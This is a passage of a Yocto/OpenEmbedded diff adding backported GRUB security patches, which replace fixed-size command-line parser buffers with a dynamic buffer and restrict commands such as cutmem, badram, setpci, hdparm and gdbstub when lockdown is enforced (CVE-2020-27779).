+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/Makefile.core.def | 1 +
+ grub-core/kern/buffer.c | 117 +++++++++++++++++++++
+ grub-core/kern/parser.c | 204 +++++++++++++++++++++++-------------
+ include/grub/buffer.h | 144 +++++++++++++++++++++++++
+ 4 files changed, 395 insertions(+), 71 deletions(-)
+ create mode 100644 grub-core/kern/buffer.c
+ create mode 100644 include/grub/buffer.h
+
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index 651ea2a..823cd57 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -123,6 +123,7 @@ kernel = {
+ riscv32_efi_startup = kern/riscv/efi/startup.S;
+ riscv64_efi_startup = kern/riscv/efi/startup.S;
+
++ common = kern/buffer.c;
+ common = kern/command.c;
+ common = kern/corecmd.c;
+ common = kern/device.c;
+diff --git a/grub-core/kern/buffer.c b/grub-core/kern/buffer.c
+new file mode 100644
+index 0000000..9f5f8b8
+--- /dev/null
++++ b/grub-core/kern/buffer.c
+@@ -0,0 +1,117 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2021 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#include <grub/buffer.h>
++#include <grub/err.h>
++#include <grub/misc.h>
++#include <grub/mm.h>
++#include <grub/safemath.h>
++#include <grub/types.h>
++
++grub_buffer_t
++grub_buffer_new (grub_size_t sz)
++{
++ struct grub_buffer *ret;
++
++ ret = (struct grub_buffer *) grub_malloc (sizeof (*ret));
++ if (ret == NULL)
++ return NULL;
++
++ ret->data = (grub_uint8_t *) grub_malloc (sz);
++ if (ret->data == NULL)
++ {
++ grub_free (ret);
++ return NULL;
++ }
++
++ ret->sz = sz;
++ ret->pos = 0;
++ ret->used = 0;
++
++ return ret;
++}
++
++void
++grub_buffer_free (grub_buffer_t buf)
++{
++ grub_free (buf->data);
++ grub_free (buf);
++}
++
++grub_err_t
++grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req)
++{
++ grub_uint8_t *d;
++ grub_size_t newsz = 1;
++
++ /* Is the current buffer size adequate? */
++ if (buf->sz >= req)
++ return GRUB_ERR_NONE;
++
++ /* Find the smallest power-of-2 size that satisfies the request. */
++ while (newsz < req)
++ {
++ if (newsz == 0)
++ return grub_error (GRUB_ERR_OUT_OF_RANGE,
++ N_("requested buffer size is too large"));
++ newsz <<= 1;
++ }
++
++ d = (grub_uint8_t *) grub_realloc (buf->data, newsz);
++ if (d == NULL)
++ return grub_errno;
++
++ buf->data = d;
++ buf->sz = newsz;
++
++ return GRUB_ERR_NONE;
++}
++
++void *
++grub_buffer_take_data (grub_buffer_t buf)
++{
++ void *data = buf->data;
++
++ buf->data = NULL;
++ buf->sz = buf->pos = buf->used = 0;
++
++ return data;
++}
++
++void
++grub_buffer_reset (grub_buffer_t buf)
++{
++ buf->pos = buf->used = 0;
++}
++
++grub_err_t
++grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n)
++{
++ grub_size_t newpos;
++
++ if (grub_add (buf->pos, n, &newpos))
++ return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
++
++ if (newpos > buf->used)
++ return grub_error (GRUB_ERR_OUT_OF_RANGE,
++ N_("new read is position beyond the end of the written data"));
++
++ buf->pos = newpos;
++
++ return GRUB_ERR_NONE;
++}
+diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
+index d1cf061..6ab7aa4 100644
+--- a/grub-core/kern/parser.c
++++ b/grub-core/kern/parser.c
+@@ -1,7 +1,7 @@
+ /* parser.c - the part of the parser that can return partial tokens */
+ /*
+ * GRUB -- GRand Unified Bootloader
+- * Copyright (C) 2005,2007,2009 Free Software Foundation, Inc.
++ * Copyright (C) 2005,2007,2009,2021 Free Software Foundation, Inc.
+ *
+ * GRUB is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+@@ -18,6 +18,7 @@
+ */
+
+ #include <grub/parser.h>
++#include <grub/buffer.h>
+ #include <grub/env.h>
+ #include <grub/misc.h>
+ #include <grub/mm.h>
+@@ -107,8 +108,8 @@ check_varstate (grub_parser_state_t s)
+ }
+
+
+-static void
+-add_var (char *varname, char **bp, char **vp,
++static grub_err_t
++add_var (grub_buffer_t varname, grub_buffer_t buf,
+ grub_parser_state_t state, grub_parser_state_t newstate)
+ {
+ const char *val;
+@@ -116,17 +117,74 @@ add_var (char *varname, char **bp, char **vp,
+ /* Check if a variable was being read in and the end of the name
+ was reached. */
+ if (!(check_varstate (state) && !check_varstate (newstate)))
+- return;
++ return GRUB_ERR_NONE;
++
++ if (grub_buffer_append_char (varname, '\0') != GRUB_ERR_NONE)
++ return grub_errno;
+
+- *((*vp)++) = '\0';
+- val = grub_env_get (varname);
+- *vp = varname;
++ val = grub_env_get ((const char *) grub_buffer_peek_data (varname));
++ grub_buffer_reset (varname);
+ if (!val)
+- return;
++ return GRUB_ERR_NONE;
+
+ /* Insert the contents of the variable in the buffer. */
+- for (; *val; val++)
+- *((*bp)++) = *val;
++ return grub_buffer_append_data (buf, val, grub_strlen (val));
++}
++
++static grub_err_t
++terminate_arg (grub_buffer_t buffer, int *argc)
++{
++ grub_size_t unread = grub_buffer_get_unread_bytes (buffer);
++
++ if (unread == 0)
++ return GRUB_ERR_NONE;
++
++ if (*(const char *) grub_buffer_peek_data_at (buffer, unread - 1) == '\0')
++ return GRUB_ERR_NONE;
++
++ if (grub_buffer_append_char (buffer, '\0') != GRUB_ERR_NONE)
++ return grub_errno;
++
++ (*argc)++;
++
++ return GRUB_ERR_NONE;
++}
++
++static grub_err_t
++process_char (char c, grub_buffer_t buffer, grub_buffer_t varname,
++ grub_parser_state_t state, int *argc,
++ grub_parser_state_t *newstate)
++{
++ char use;
++
++ *newstate = grub_parser_cmdline_state (state, c, &use);
++
++ /*
++ * If a variable was being processed and this character does
++ * not describe the variable anymore, write the variable to
++ * the buffer.
++ */
++ if (add_var (varname, buffer, state, *newstate) != GRUB_ERR_NONE)
++ return grub_errno;
++
++ if (check_varstate (*newstate))
++ {
++ if (use)
++ return grub_buffer_append_char (varname, use);
++ }
++ else if (*newstate == GRUB_PARSER_STATE_TEXT &&
++ state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
++ {
++ /*
++ * Don't add more than one argument if multiple
++ * spaces are used.
++ */
++ return terminate_arg (buffer, argc);
++ }
++ else if (use)
++ return grub_buffer_append_char (buffer, use);
++
++ return GRUB_ERR_NONE;
+ }
+
+ grub_err_t
+@@ -135,24 +193,36 @@ grub_parser_split_cmdline (const char *cmdline,
+ int *argc, char ***argv)
+ {
+ grub_parser_state_t state = GRUB_PARSER_STATE_TEXT;
+- /* XXX: Fixed size buffer, perhaps this buffer should be dynamically
+- allocated. */
+- char buffer[1024];
+- char *bp = buffer;
++ grub_buffer_t buffer, varname;
+ char *rd = (char *) cmdline;
+- char varname[200];
+- char *vp = varname;
+- char *args;
++ char *rp = rd;
+ int i;
+
+ *argc = 0;
+ *argv = NULL;
++
++ buffer = grub_buffer_new (1024);
++ if (buffer == NULL)
++ return grub_errno;
++
++ varname = grub_buffer_new (200);
++ if (varname == NULL)
++ goto fail;
++
+ do
+ {
+- if (!rd || !*rd)
++ if (rp == NULL || *rp == '\0')
+ {
++ if (rd != cmdline)
++ {
++ grub_free (rd);
++ rd = rp = NULL;
++ }
+ if (getline)
+- getline (&rd, 1, getline_data);
++ {
++ getline (&rd, 1, getline_data);
++ rp = rd;
++ }
+ else
+ break;
+ }
+@@ -160,39 +230,14 @@ grub_parser_split_cmdline (const char *cmdline,
+ if (!rd)
+ break;
+
+- for (; *rd; rd++)
++ for (; *rp != '\0'; rp++)
+ {
+ grub_parser_state_t newstate;
+- char use;
+
+- newstate = grub_parser_cmdline_state (state, *rd, &use);
++ if (process_char (*rp, buffer, varname, state, argc,
++ &newstate) != GRUB_ERR_NONE)
++ goto fail;
+
+- /* If a variable was being processed and this character does
+- not describe the variable anymore, write the variable to
+- the buffer. */
+- add_var (varname, &bp, &vp, state, newstate);
+-
+- if (check_varstate (newstate))
+- {
+- if (use)
+- *(vp++) = use;
+- }
+- else
+- {
+- if (newstate == GRUB_PARSER_STATE_TEXT
+- && state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
+- {
+- /* Don't add more than one argument if multiple
+- spaces are used. */
+- if (bp != buffer && *(bp - 1))
+- {
+- *(bp++) = '\0';
+- (*argc)++;
+- }
+- }
+- else if (use)
+- *(bp++) = use;
+- }
+ state = newstate;
+ }
+ }
+@@ -200,43 +245,60 @@ grub_parser_split_cmdline (const char *cmdline,
+
+ /* A special case for when the last character was part of a
+ variable. */
+- add_var (varname, &bp, &vp, state, GRUB_PARSER_STATE_TEXT);
++ if (add_var (varname, buffer, state, GRUB_PARSER_STATE_TEXT) != GRUB_ERR_NONE)
++ goto fail;
+
+- if (bp != buffer && *(bp - 1))
+- {
+- *(bp++) = '\0';
+- (*argc)++;
+- }
++ /* Ensure that the last argument is terminated. */
++ if (terminate_arg (buffer, argc) != GRUB_ERR_NONE)
++ goto fail;
+
+ /* If there are no args, then we're done. */
+ if (!*argc)
+- return 0;
+-
+- /* Reserve memory for the return values. */
+- args = grub_malloc (bp - buffer);
+- if (!args)
+- return grub_errno;
+- grub_memcpy (args, buffer, bp - buffer);
++ {
++ grub_errno = GRUB_ERR_NONE;
++ goto out;
++ }
+
+ *argv = grub_calloc (*argc + 1, sizeof (char *));
+ if (!*argv)
+- {
+- grub_free (args);
+- return grub_errno;
+- }
++ goto fail;
+
+ /* The arguments are separated with 0's, setup argv so it points to
+ the right values. */
+- bp = args;
+ for (i = 0; i < *argc; i++)
+ {
+- (*argv)[i] = bp;
+- while (*bp)
+- bp++;
+- bp++;
++ char *arg;
++
++ if (i > 0)
++ {
++ if (grub_buffer_advance_read_pos (buffer, 1) != GRUB_ERR_NONE)
++ goto fail;
++ }
++
++ arg = (char *) grub_buffer_peek_data (buffer);
++ if (arg == NULL ||
++ grub_buffer_advance_read_pos (buffer, grub_strlen (arg)) != GRUB_ERR_NONE)
++ goto fail;
++
++ (*argv)[i] = arg;
+ }
+
+- return 0;
++ /* Keep memory for the return values. */
++ grub_buffer_take_data (buffer);
++
++ grub_errno = GRUB_ERR_NONE;
++
++ out:
++ if (rd != cmdline)
++ grub_free (rd);
++ grub_buffer_free (buffer);
++ grub_buffer_free (varname);
++
++ return grub_errno;
++
++ fail:
++ grub_free (*argv);
++ goto out;
+ }
+
+ /* Helper for grub_parser_execute. */
+diff --git a/include/grub/buffer.h b/include/grub/buffer.h
+new file mode 100644
+index 0000000..f4b10cf
+--- /dev/null
++++ b/include/grub/buffer.h
+@@ -0,0 +1,144 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2021 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#ifndef GRUB_BUFFER_H
++#define GRUB_BUFFER_H 1
++
++#include <grub/err.h>
++#include <grub/misc.h>
++#include <grub/mm.h>
++#include <grub/safemath.h>
++#include <grub/types.h>
++
++struct grub_buffer
++{
++ grub_uint8_t *data;
++ grub_size_t sz;
++ grub_size_t pos;
++ grub_size_t used;
++};
++
++/*
++ * grub_buffer_t represents a simple variable sized byte buffer with
++ * read and write cursors. It currently only implements
++ * functionality required by the only user in GRUB (append byte[s],
++ * peeking data at a specified position and updating the read cursor.
++ * Some things that this doesn't do yet are:
++ * - Reading a portion of the buffer by copying data from the current
++ * read position in to a caller supplied destination buffer and then
++ * automatically updating the read cursor.
++ * - Dropping the read part at the start of the buffer when an append
++ * requires more space.
++ */
++typedef struct grub_buffer *grub_buffer_t;
++
++/* Allocate a new buffer with the specified initial size. */
++extern grub_buffer_t grub_buffer_new (grub_size_t sz);
++
++/* Free the buffer and its resources. */
++extern void grub_buffer_free (grub_buffer_t buf);
++
++/* Return the number of unread bytes in this buffer. */
++static inline grub_size_t
++grub_buffer_get_unread_bytes (grub_buffer_t buf)
++{
++ return buf->used - buf->pos;
++}
++
++/*
++ * Ensure that the buffer size is at least the requested
++ * number of bytes.
++ */
++extern grub_err_t grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req);
++
++/*
++ * Append the specified number of bytes from the supplied
++ * data to the buffer.
++ */
++static inline grub_err_t
++grub_buffer_append_data (grub_buffer_t buf, const void *data, grub_size_t len)
++{
++ grub_size_t req;
++
++ if (grub_add (buf->used, len, &req))
++ return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
++
++ if (grub_buffer_ensure_space (buf, req) != GRUB_ERR_NONE)
++ return grub_errno;
++
++ grub_memcpy (&buf->data[buf->used], data, len);
++ buf->used = req;
++
++ return GRUB_ERR_NONE;
++}
++
++/* Append the supplied character to the buffer. */
++static inline grub_err_t
++grub_buffer_append_char (grub_buffer_t buf, char c)
++{
++ return grub_buffer_append_data (buf, &c, 1);
++}
++
++/*
++ * Forget and return the underlying data buffer. The caller
++ * becomes the owner of this buffer, and must free it when it
++ * is no longer required.
++ */
++extern void *grub_buffer_take_data (grub_buffer_t buf);
++
++/* Reset this buffer. Note that this does not deallocate any resources. */
++void grub_buffer_reset (grub_buffer_t buf);
++
++/*
++ * Return a pointer to the underlying data buffer at the specified
++ * offset from the current read position. Note that this pointer may
++ * become invalid if the buffer is mutated further.
++ */
++static inline void *
++grub_buffer_peek_data_at (grub_buffer_t buf, grub_size_t off)
++{
++ if (grub_add (buf->pos, off, &off))
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected."));
++ return NULL;
++ }
++
++ if (off >= buf->used)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE, N_("peek out of range"));
++ return NULL;
++ }
++
++ return &buf->data[off];
++}
++
++/*
++ * Return a pointer to the underlying data buffer at the current
++ * read position. Note that this pointer may become invalid if the
++ * buffer is mutated further.
++ */
++static inline void *
++grub_buffer_peek_data (grub_buffer_t buf)
++{
++ return grub_buffer_peek_data_at (buf, 0);
++}
++
++/* Advance the read position by the specified number of bytes. */
++extern grub_err_t grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n);
++
++#endif /* GRUB_BUFFER_H */
+--
+2.25.1
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779.patch
new file mode 100644
index 0000000000..c82423b8af
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779.patch
@@ -0,0 +1,70 @@
+From 584263eca1546e5cab69ba6fe7b4b07df2630a21 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 14 Oct 2020 16:33:42 +0200
+Subject: [PATCH] mmap: Don't register cutmem and badram commands when lockdown
+ is enforced
+
+The cutmem and badram commands can be used to remove EFI memory regions
+and potentially disable the UEFI Secure Boot. Prevent the commands to be
+registered if the GRUB is locked down.
+
+Fixes: CVE-2020-27779
+
+Reported-by: Teddy Reed <teddy.reed@gmail.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d298b41f90cbf1f2e5a10e29daa1fc92ddee52c9]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 4 ++++
+ grub-core/mmap/mmap.c | 13 +++++++------
+ 2 files changed, 11 insertions(+), 6 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 47ac7ff..a1aaee6 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -4051,6 +4051,10 @@ this page is to be filtered. This syntax makes it easy to represent patterns
+ that are often result of memory damage, due to physical distribution of memory
+ cells.
+
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This prevents removing EFI memory regions to potentially subvert the
++ security mechanisms provided by the UEFI secure boot.
++
+ @node blocklist
+ @subsection blocklist
+
+diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
+index 57b4e9a..7ebf32e 100644
+--- a/grub-core/mmap/mmap.c
++++ b/grub-core/mmap/mmap.c
+@@ -20,6 +20,7 @@
+ #include <grub/memory.h>
+ #include <grub/machine/memory.h>
+ #include <grub/err.h>
++#include <grub/lockdown.h>
+ #include <grub/misc.h>
+ #include <grub/mm.h>
+ #include <grub/command.h>
+@@ -534,12 +535,12 @@ static grub_command_t cmd, cmd_cut;
+
+ GRUB_MOD_INIT(mmap)
+ {
+- cmd = grub_register_command ("badram", grub_cmd_badram,
+- N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
+- N_("Declare memory regions as faulty (badram)."));
+- cmd_cut = grub_register_command ("cutmem", grub_cmd_cutmem,
+- N_("FROM[K|M|G] TO[K|M|G]"),
+- N_("Remove any memory regions in specified range."));
++ cmd = grub_register_command_lockdown ("badram", grub_cmd_badram,
++ N_("ADDR1,MASK1[,ADDR2,MASK2[,...]]"),
++ N_("Declare memory regions as faulty (badram)."));
++ cmd_cut = grub_register_command_lockdown ("cutmem", grub_cmd_cutmem,
++ N_("FROM[K|M|G] TO[K|M|G]"),
++ N_("Remove any memory regions in specified range."));
+
+ }
+
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch
new file mode 100644
index 0000000000..e33c96a05b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_2.patch
@@ -0,0 +1,105 @@
+From 4ff1dfdf8c4c71bf4b0dd0488d9fa40ff2617f41 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 09:00:05 +0100
+Subject: [PATCH] commands: Restrict commands that can load BIOS or DT blobs
+ when locked down
+
+There are some more commands that should be restricted when the GRUB is
+locked down. Following is the list of commands and reasons to restrict:
+
+ * fakebios: creates BIOS-like structures for backward compatibility with
+ existing OSes. This should not be allowed when locked down.
+
+ * loadbios: reads a BIOS dump from storage and loads it. This action
+ should not be allowed when locked down.
+
+ * devicetree: loads a Device Tree blob and passes it to the OS. It replaces
+ any Device Tree provided by the firmware. This also should
+ not be allowed when locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=468a5699b249fe6816b4e7e86c5dc9d325c9b09e]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 3 +++
+ grub-core/commands/efi/loadbios.c | 16 ++++++++--------
+ grub-core/loader/arm/linux.c | 6 +++---
+ grub-core/loader/efi/fdt.c | 4 ++--
+ 4 files changed, 16 insertions(+), 13 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index a1aaee6..ccf1908 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -4236,6 +4236,9 @@ Load a device tree blob (.dtb) from a filesystem, for later use by a Linux
+ kernel. Does not perform merging with any device tree supplied by firmware,
+ but rather replaces it completely.
+ @ref{GNU/Linux}.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This is done to prevent subverting various security mechanisms.
+ @end deffn
+
+ @node distrust
+diff --git a/grub-core/commands/efi/loadbios.c b/grub-core/commands/efi/loadbios.c
+index d41d521..5c7725f 100644
+--- a/grub-core/commands/efi/loadbios.c
++++ b/grub-core/commands/efi/loadbios.c
+@@ -205,14 +205,14 @@ static grub_command_t cmd_fakebios, cmd_loadbios;
+
+ GRUB_MOD_INIT(loadbios)
+ {
+- cmd_fakebios = grub_register_command ("fakebios", grub_cmd_fakebios,
+- 0, N_("Create BIOS-like structures for"
+- " backward compatibility with"
+- " existing OS."));
+-
+- cmd_loadbios = grub_register_command ("loadbios", grub_cmd_loadbios,
+- N_("BIOS_DUMP [INT10_DUMP]"),
+- N_("Load BIOS dump."));
++ cmd_fakebios = grub_register_command_lockdown ("fakebios", grub_cmd_fakebios,
++ 0, N_("Create BIOS-like structures for"
++ " backward compatibility with"
++ " existing OS."));
++
++ cmd_loadbios = grub_register_command_lockdown ("loadbios", grub_cmd_loadbios,
++ N_("BIOS_DUMP [INT10_DUMP]"),
++ N_("Load BIOS dump."));
+ }
+
+ GRUB_MOD_FINI(loadbios)
+diff --git a/grub-core/loader/arm/linux.c b/grub-core/loader/arm/linux.c
+index d70c174..ed23dc7 100644
+--- a/grub-core/loader/arm/linux.c
++++ b/grub-core/loader/arm/linux.c
+@@ -493,9 +493,9 @@ GRUB_MOD_INIT (linux)
+ 0, N_("Load Linux."));
+ cmd_initrd = grub_register_command ("initrd", grub_cmd_initrd,
+ 0, N_("Load initrd."));
+- cmd_devicetree = grub_register_command ("devicetree", grub_cmd_devicetree,
+- /* TRANSLATORS: DTB stands for device tree blob. */
+- 0, N_("Load DTB file."));
++ cmd_devicetree = grub_register_command_lockdown ("devicetree", grub_cmd_devicetree,
++ /* TRANSLATORS: DTB stands for device tree blob. */
++ 0, N_("Load DTB file."));
+ my_mod = mod;
+ current_fdt = (const void *) grub_arm_firmware_get_boot_data ();
+ machine_type = grub_arm_firmware_get_machine_type ();
+diff --git a/grub-core/loader/efi/fdt.c b/grub-core/loader/efi/fdt.c
+index ee9c559..003d07c 100644
+--- a/grub-core/loader/efi/fdt.c
++++ b/grub-core/loader/efi/fdt.c
+@@ -165,8 +165,8 @@ static grub_command_t cmd_devicetree;
+ GRUB_MOD_INIT (fdt)
+ {
+ cmd_devicetree =
+- grub_register_command ("devicetree", grub_cmd_devicetree, 0,
+- N_("Load DTB file."));
++ grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, 0,
++ N_("Load DTB file."));
+ }
+
+ GRUB_MOD_FINI (fdt)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch
new file mode 100644
index 0000000000..f9a6a73ebc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch
@@ -0,0 +1,37 @@
+From e4f5c16f76e137b3beb6b61a6d2435e54fcb495c Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 22:59:59 +0100
+Subject: [PATCH] commands/setpci: Restrict setpci command when locked down
+
+This command can set PCI devices register values, which makes it dangerous
+in a locked down configuration. Restrict it so can't be used on this setup.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=58b77d4069823b44c5fa916fa8ddfc9c4cd51e02]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/setpci.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/commands/setpci.c b/grub-core/commands/setpci.c
+index d5bc97d..fa2ba7d 100644
+--- a/grub-core/commands/setpci.c
++++ b/grub-core/commands/setpci.c
+@@ -329,10 +329,10 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(setpci)
+ {
+- cmd = grub_register_extcmd ("setpci", grub_cmd_setpci, 0,
+- N_("[-s POSITION] [-d DEVICE] [-v VAR] "
+- "REGISTER[=VALUE[:MASK]]"),
+- N_("Manipulate PCI devices."), options);
++ cmd = grub_register_extcmd_lockdown ("setpci", grub_cmd_setpci, 0,
++ N_("[-s POSITION] [-d DEVICE] [-v VAR] "
++ "REGISTER[=VALUE[:MASK]]"),
++ N_("Manipulate PCI devices."), options);
+ }
+
+ GRUB_MOD_FINI(setpci)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch
new file mode 100644
index 0000000000..a756f8d1cf
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch
@@ -0,0 +1,35 @@
+From 7949671de268ba3116d113778e5d770574e9f9e3 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 12:59:29 +0100
+Subject: [PATCH] commands/hdparm: Restrict hdparm command when locked down
+
+The command can be used to get/set ATA disk parameters. Some of these can
+be dangerous since change the disk behavior. Restrict it when locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5c97492a29c6063567b65ed1a069f5e6f4e211f0]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/hdparm.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/commands/hdparm.c b/grub-core/commands/hdparm.c
+index d3fa966..2e2319e 100644
+--- a/grub-core/commands/hdparm.c
++++ b/grub-core/commands/hdparm.c
+@@ -436,9 +436,9 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(hdparm)
+ {
+- cmd = grub_register_extcmd ("hdparm", grub_cmd_hdparm, 0,
+- N_("[OPTIONS] DISK"),
+- N_("Get/set ATA disk parameters."), options);
++ cmd = grub_register_extcmd_lockdown ("hdparm", grub_cmd_hdparm, 0,
++ N_("[OPTIONS] DISK"),
++ N_("Get/set ATA disk parameters."), options);
+ }
+
+ GRUB_MOD_FINI(hdparm)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch
new file mode 100644
index 0000000000..b52273ff50
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch
@@ -0,0 +1,62 @@
+From 6993cce7c3a9d15e6573845f455d2f0de424a717 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 15:03:26 +0100
+Subject: [PATCH] gdb: Restrict GDB access when locked down
+
+The gdbstub* commands allow to start and control a GDB stub running on
+local host that can be used to connect from a remote debugger. Restrict
+this functionality when the GRUB is locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=508270838998f151a82e9c13e7cb8a470a2dc23d]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/gdb/gdb.c | 32 ++++++++++++++++++--------------
+ 1 file changed, 18 insertions(+), 14 deletions(-)
+
+diff --git a/grub-core/gdb/gdb.c b/grub-core/gdb/gdb.c
+index 847a1e1..1818cb6 100644
+--- a/grub-core/gdb/gdb.c
++++ b/grub-core/gdb/gdb.c
+@@ -75,20 +75,24 @@ static grub_command_t cmd, cmd_stop, cmd_break;
+ GRUB_MOD_INIT (gdb)
+ {
+ grub_gdb_idtinit ();
+- cmd = grub_register_command ("gdbstub", grub_cmd_gdbstub,
+- N_("PORT"),
+- /* TRANSLATORS: GDB stub is a small part of
+- GDB functionality running on local host
+- which allows remote debugger to
+- connect to it. */
+- N_("Start GDB stub on given port"));
+- cmd_break = grub_register_command ("gdbstub_break", grub_cmd_gdb_break,
+- /* TRANSLATORS: this refers to triggering
+- a breakpoint so that the user will land
+- into GDB. */
+- 0, N_("Break into GDB"));
+- cmd_stop = grub_register_command ("gdbstub_stop", grub_cmd_gdbstop,
+- 0, N_("Stop GDB stub"));
++ cmd = grub_register_command_lockdown ("gdbstub", grub_cmd_gdbstub,
++ N_("PORT"),
++ /*
++ * TRANSLATORS: GDB stub is a small part of
++ * GDB functionality running on local host
++ * which allows remote debugger to
++ * connect to it.
++ */
++ N_("Start GDB stub on given port"));
++ cmd_break = grub_register_command_lockdown ("gdbstub_break", grub_cmd_gdb_break,
++ /*
++ * TRANSLATORS: this refers to triggering
++ * a breakpoint so that the user will land
++ * into GDB.
++ */
++ 0, N_("Break into GDB"));
++ cmd_stop = grub_register_command_lockdown ("gdbstub_stop", grub_cmd_gdbstop,
++ 0, N_("Stop GDB stub"));
+ }
+
+ GRUB_MOD_FINI (gdb)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch
new file mode 100644
index 0000000000..474826ade5
--- /dev/null
